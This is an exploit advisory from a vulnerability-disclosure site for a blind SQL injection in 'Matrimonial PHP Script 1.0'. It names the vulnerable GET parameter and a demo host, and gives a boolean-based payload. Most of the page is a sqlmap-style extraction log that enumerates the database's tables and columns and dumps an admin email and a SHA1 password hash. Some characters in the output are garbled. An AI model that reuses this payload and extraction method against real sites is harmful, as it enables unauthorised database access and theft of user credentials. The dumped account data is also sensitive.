Matrimonial PHP Script 1.0 SQL Injection

2022.08.12
Credit: CraCkEr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : uisort.com │ │ │ │ Vendor : Uisort Technologies Pvt. Ltd. │ │ │ │ Software : Matrimonial PHP Script v1.0 │ │ Matrimonial Script PHP tailored with │ │ Demo : stage.matrimic.in │ │ advanced features website │ │ Vuln Type: Remote SQL Injection │ │ & mobile apps from matrimic │ │ Method : GET │ │ │ │ Impact : Database Access │ │ │ │ │ │ │ │────────────────────────────────────────────┘ └─────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ GET parameter 'Userdetails[ud_gender]' is vulnerable --- Parameter: Userdetails[ud_gender] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Userdetails[ud_gender]=1 AND 2636=2636 --- [+] Starting the Attack [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0.0 [INFO] fetching current database [INFO] retrieved: stage_db_qa [INFO] fetching number of tables for database 'stage_db_qa' Database: stage_db_qa [37 tables] +--------------------+ | YiiCache | | YiiLog | | mc_admin | | mc_blocklist | | mc_caste | | mc_city | | mc_cms | | mc_contact | | mc_contact_history | | mc_country | | mc_currency | | mc_deleteprofile | | mc_education | | mc_feedback | | mc_gallery | | mc_height | | mc_horoscope | | mc_import_jobs | | mc_interest | | mc_language | | mc_message | | mc_occupation | | mc_partner | | mc_plan | | mc_profile_viewed | | mc_religion | | mc_searchlist | | mc_settings | | mc_shortlist | | mc_sms_history | | mc_state | | mc_subcaste | | mc_success_story | | mc_toungue | | mc_transaction | | mc_user | | mc_userdetails | +--------------------+ [INFO] fetching columns for table 'mc_admin' in database 'stage_db_qa' Database: stage_db_qa Table: mc_admin [4 columns] +--------------+-------------+ | Column | Type | +--------------+-------------+ | admin_email | varchar(32) | | admin_id | int(11) | | admin_name | varchar(32) | | admin_status | int(11) | +--------------+-------------+ [INFO] fetching number of column(s) 'admin_email,admin_id,admin_name,admin_status' entries for table 'mc_admin' in database 'stage_db_qa' Database: stage_db_qa Table: mc_admin [1 entry] +----------+-----------------------+------------+--------------+ | admin_id | admin_email | admin_name | admin_status | +----------+-----------------------+------------+--------------+ | 1 | admin@mat\x81imic.com | Admin | 1 | +----------+-----------------------+------------+--------------+ [INFO] fetching columns for table 'mc_user' in database 'stage_db_qa' Database: stage_db_qa Table: mc_user [20 columns] +------------------------+--------------+ | Column | Type | +------------------------+--------------+ | api_token | varchar(255) | | code | varchar(128) | | device | varchar(32) | | user_activecode | varchar(32) | | user_activedate | datetime | | user_activestatus | int(11) | | user_android_device_id | varchar(255) | | user_email | varchar(32) | | user_id | int(11) | | user_ios_device_id | varchar(255) | | user_ipaddress | varchar(32( | | user_lastlogin | datetime | | user_mobile | bigint(20) | | user_opensource | varchar(32) | | user_password | varchar(255) | | user_salt | varchar(64) | | user_status | int(11) | | user_type | int(11) | | user_userid | int(11) | | user_verified_token | varchar(255) | +------------------------+--------------+ [INFO] fetching number of column(s) 'user_email,user_id,user_password,user_type,user_userid' entries for table 'mc_user' in database 'stage_db_qa' Database: stage_db_qa Table: mc_user [1 entry] +---------+--------------------+------------------------------------------+-----------+-------------+ | user_id | user_email | user_password | user_type | user_userid | +---------+--------------------+------------------------------------------+-----------+-------------+ | 1 | admin@matrimic.com | fa4c71db18591d0323141b39ab337b59b584b3b9 | 1 | 1 | +---------+--------------------+------------------------------------------+-----------+-------------+ Possible Algorithms: SHA1 [-] Done


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top